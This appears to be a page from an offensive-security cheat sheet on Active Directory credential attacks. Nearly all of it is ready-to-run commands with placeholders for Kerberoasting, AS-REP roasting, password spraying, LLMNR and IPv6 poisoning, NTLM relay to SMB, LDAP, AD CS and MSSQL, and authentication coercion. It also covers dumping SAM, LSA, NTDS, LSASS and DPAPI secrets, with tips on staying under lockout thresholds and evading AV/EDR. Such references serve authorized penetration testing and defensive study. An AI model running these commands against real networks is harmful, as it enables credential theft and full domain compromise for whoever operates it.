Credential Attack

You've enumerated the domain. Now it's time to harvest, crack, relay, and dump credentials to expand your access.

Sections Credential Attack

Kerberoasting

Extract TGS hashes for service accounts with SPNs. [Kerberos]

terminal.log
root@localhost:~# impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request -outputfile kerberoast_hashes.txt

With hash (PTH). [Kerberos]

terminal.log
root@localhost:~# impacket-GetUserSPNs <DOMAIN>/<USER> -hashes :<HASH> -dc-ip <DC_IP> -request -outputfile kerberoast_hashes.txt

Via NetExec. [Kerberos]

terminal.log
root@localhost:~# nxc ldap <DC_IP> -u <USER> -p <PASS> --kerberoasting kerberoast_hashes.txt

Targeted Kerberoasting

Set an SPN on a target you have GenericAll/GenericWrite on, roast it, then clean up. [Kerberos] [Requires GenericAll/GenericWrite on target]

terminal.log
root@localhost:~# python3 targetedKerberoast.py -u <USER> -p <PASS> -d <DOMAIN_FQDN> --dc-ip <DC_IP>

Manual approach with bloodyAD.

terminal.log
# Set SPN on target
root@localhost:~# bloodyAD -u <USER> -p <PASS> -d <DOMAIN_FQDN> --host <DC_IP> set object <TARGET_USER> servicePrincipalName -v 'MSSQLSvc/fake.domain.local:1433'

# Roast it
root@localhost:~# impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request-user <TARGET_USER> -outputfile targeted_hash.txt

# Clean up (remove the SPN)
root@localhost:~# bloodyAD -u <USER> -p <PASS> -d <DOMAIN_FQDN> --host <DC_IP> set object <TARGET_USER> servicePrincipalName

Cracking TGS Hashes

RC4 encrypted (mode 13100).

terminal.log
root@localhost:~# hashcat -m 13100 kerberoast_hashes.txt wordlist.txt

AES256 encrypted (mode 19700).

terminal.log
root@localhost:~# hashcat -m 19700 kerberoast_hashes.txt wordlist.txt
Tip
RC4 hashes are far more common and faster to crack. AES256 means the account was configured with AES encryption (harder to crack, but still worth trying with a good wordlist).

AS-REP Roasting

Unauthenticated (with a user list)

terminal.log
root@localhost:~# impacket-GetNPUsers <DOMAIN>/ -dc-ip <DC_IP> -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt

Authenticated (auto-enumerate vulnerable accounts)

terminal.log
root@localhost:~# impacket-GetNPUsers <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request -format hashcat -outputfile asrep_hashes.txt

Crack AS-REP Hashes

terminal.log
root@localhost:~# hashcat -m 18200 asrep_hashes.txt wordlist.txt

Password Spraying

Spray a single password across all users. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u users.txt -p '<PASSWORD>' --continue-on-success

Kerberos-based spray (stealthier, fewer logon events). [Kerberos]

terminal.log
root@localhost:~# kerbrute passwordspray -d <DOMAIN_FQDN> --dc <DC_IP> users.txt '<PASSWORD>'

Multiple passwords against multiple users. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
Tip
--no-bruteforce pairs each user with the corresponding password line-by-line instead of trying every combination. Useful for credential stuffing.

Spray via LDAP (sometimes works when SMB is locked down). [LDAP]

terminal.log
root@localhost:~# nxc ldap <DC_IP> -u users.txt -p '<PASSWORD>' --continue-on-success
Tip
Always check the password policy first (nxc smb <DC_IP> -u '' -p '' --pass-pol). Stay under the lockout threshold. Wait for the observation window between sprays.

LLMNR / NBT-NS / mDNS Poisoning

Capture NTLMv2 hashes on the local network.

terminal.log
root@localhost:~# responder -I eth0 -dwPv

Analyze mode first (see traffic without poisoning).

terminal.log
root@localhost:~# responder -I eth0 -A

Crack NTLMv2 Hashes

terminal.log
root@localhost:~# hashcat -m 5600 ntlmv2_hashes.txt wordlist.txt

NTLM Relay

Relay to SMB

Relay captured auth to hosts with SMB signing disabled.

terminal.log
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support

Relay and execute a command.

terminal.log
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support -c 'whoami'

Relay and dump SAM.

terminal.log
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support --dump-sam

Relay to LDAP

Relay to LDAP to create a machine account and set RBCD. [LDAP]

terminal.log
root@localhost:~# impacket-ntlmrelayx -t ldap://<DC_IP> --delegate-access -smb2support

Relay to LDAP to set Shadow Credentials. [LDAP]

terminal.log
root@localhost:~# impacket-ntlmrelayx -t ldap://<DC_IP> --shadow-credentials --shadow-target <TARGET>$ -smb2support

Relay to AD CS (ESC8)

Relay to the CA’s HTTP enrollment endpoint. [AD CS]

terminal.log
root@localhost:~# impacket-ntlmrelayx -t http://<CA_IP>/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Tip
ESC8 is one of the most impactful relay attacks. Coerce a DC, relay to the CA, get a DC certificate, then authenticate as the DC. Game over.

Relay to MSSQL

terminal.log
root@localhost:~# impacket-ntlmrelayx -t mssql://<TARGET> -smb2support -q 'SELECT system_user'

Authentication Coercion

Force a target machine to authenticate to your listener.

Coercer (tries all methods automatically)

terminal.log
root@localhost:~# coercer coerce -u <USER> -p <PASS> -d <DOMAIN_FQDN> -l <LISTENER_IP> -t <TARGET>

Scan for available coercion methods without triggering them.

terminal.log
root@localhost:~# coercer scan -u <USER> -p <PASS> -d <DOMAIN_FQDN> -t <TARGET>

PetitPotam (MS-EFSRPC)

Unauthenticated (on unpatched DCs).

terminal.log
root@localhost:~# python3 PetitPotam.py <LISTENER_IP> <DC_IP>

Authenticated.

terminal.log
root@localhost:~# python3 PetitPotam.py -u <USER> -p <PASS> -d <DOMAIN> <LISTENER_IP> <TARGET>

PrinterBug / SpoolService (MS-RPRN)

terminal.log
root@localhost:~# python3 dementor.py -u <USER> -p <PASS> -d <DOMAIN> <LISTENER_IP> <TARGET>

DFSCoerce (MS-DFSNM)

terminal.log
root@localhost:~# python3 DFSCoerce.py -u <USER> -p <PASS> -d <DOMAIN> <LISTENER_IP> <TARGET>
Tip
Chain coercion with relay. The typical combo: coerce a DC → relay to LDAP (set RBCD or Shadow Creds) or relay to AD CS (ESC8). Always have your relay listener running before triggering coercion.

IPv6 DNS Poisoning + Relay

Poison IPv6 DNS via WPAD and relay to LDAP. [IPv6] [LDAP]

terminal.log
# Terminal 1 (poison)
root@localhost:~# mitm6 -d <DOMAIN_FQDN>

# Terminal 2 (relay to LDAP for RBCD)
root@localhost:~# impacket-ntlmrelayx -6 -t ldaps://<DC_IP> --delegate-access -wh wpad.<DOMAIN_FQDN>

Relay to AD CS instead. [IPv6] [AD CS]

terminal.log
# Terminal 1
root@localhost:~# mitm6 -d <DOMAIN_FQDN>

# Terminal 2
root@localhost:~# impacket-ntlmrelayx -6 -t http://<CA_IP>/certsrv/certfnsh.asp --adcs --template Machine -wh wpad.<DOMAIN_FQDN>
Tip
mitm6 is passive and waits for DHCPv6 requests. It can take a few minutes to catch traffic. Be patient.

Credential Dumping

SAM Hive (local accounts)

[SMB] [Requires Local Admin]

terminal.log
root@localhost:~# nxc smb <TARGET> -u <USER> -p <PASS> --sam

With hash.

terminal.log
root@localhost:~# nxc smb <TARGET> -u <USER> -H <HASH> --sam

LSA Secrets (service account creds, cached domain creds)

[SMB] [Requires Local Admin]

terminal.log
root@localhost:~# nxc smb <TARGET> -u <USER> -p <PASS> --lsa

NTDS.dit (all domain hashes)

[SMB] [Requires DA]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u <USER> -p <PASS> --ntds

NTDS with history (previous passwords).

terminal.log
root@localhost:~# nxc smb <DC_IP> -u <USER> -p <PASS> --ntds --history

Impacket secretsdump (full dump)

Dumps SAM + LSA + NTDS + cached creds in one shot.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP>

With hash.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>@<DC_IP> -hashes :<HASH>

NTDS only (faster).

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc

NTLM hashes only (fastest).

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-ntlm

Target a specific user.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-user Administrator

Via Kerberos.

terminal.log
root@localhost:~# export KRB5CCNAME=<USER>.ccache
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>@<DC_FQDN> -k -no-pass

LSASS Dumping

Dump LSASS remotely with lsassy. [Requires Local Admin]

terminal.log
root@localhost:~# lsassy -u <USER> -p <PASS> -d <DOMAIN> <TARGET>

Via NetExec module.

terminal.log
root@localhost:~# nxc smb <TARGET> -u <USER> -p <PASS> -M lsassy

With hash.

terminal.log
root@localhost:~# lsassy -u <USER> -H <HASH> -d <DOMAIN> <TARGET>
Tip
If AV/EDR is blocking standard methods, try alternative dump techniques: nanodump, HandleKatz, or MiniDumpWriteDump via custom tooling.

DPAPI Secrets

Extract DPAPI-protected secrets (saved passwords, browser creds, etc.). [Requires Local Admin]

terminal.log
root@localhost:~# nxc smb <TARGET> -u <USER> -p <PASS> -M dpapi

Dump DPAPI backup keys from the DC. [Requires DA]

terminal.log
root@localhost:~# impacket-dpapi backupkeys -t <DC_IP> -u <USER> -p <PASS>
Tip
DPAPI backup keys from the DC let you decrypt any user’s DPAPI-protected secrets domain-wide.

Certificate Theft

Extract user/machine certificates from a target using Masky. [SMB] [Requires Local Admin]

terminal.log
root@localhost:~# nxc smb <TARGET> -u <USER> -p <PASS> -M masky
Tip
Stolen certificates can be used for authentication even after a password reset. They remain valid until the cert expires or is revoked.

Hash Formats (Quick Reference)

Attack Hashcat Mode Example Prefix
NTLM (PTH) 1000 aad3b435b51404eeaad3b435b51404ee:...
NTLMv2 (Responder) 5600 USER::DOMAIN:challenge:...
AS-REP Roast 18200 $krb5asrep$23$...
Kerberoast RC4 13100 $krb5tgs$23$...
Kerberoast AES256 19700 $krb5tgs$18$...
NetNTLMv1 5500 USER::DOMAIN:LM:NT:challenge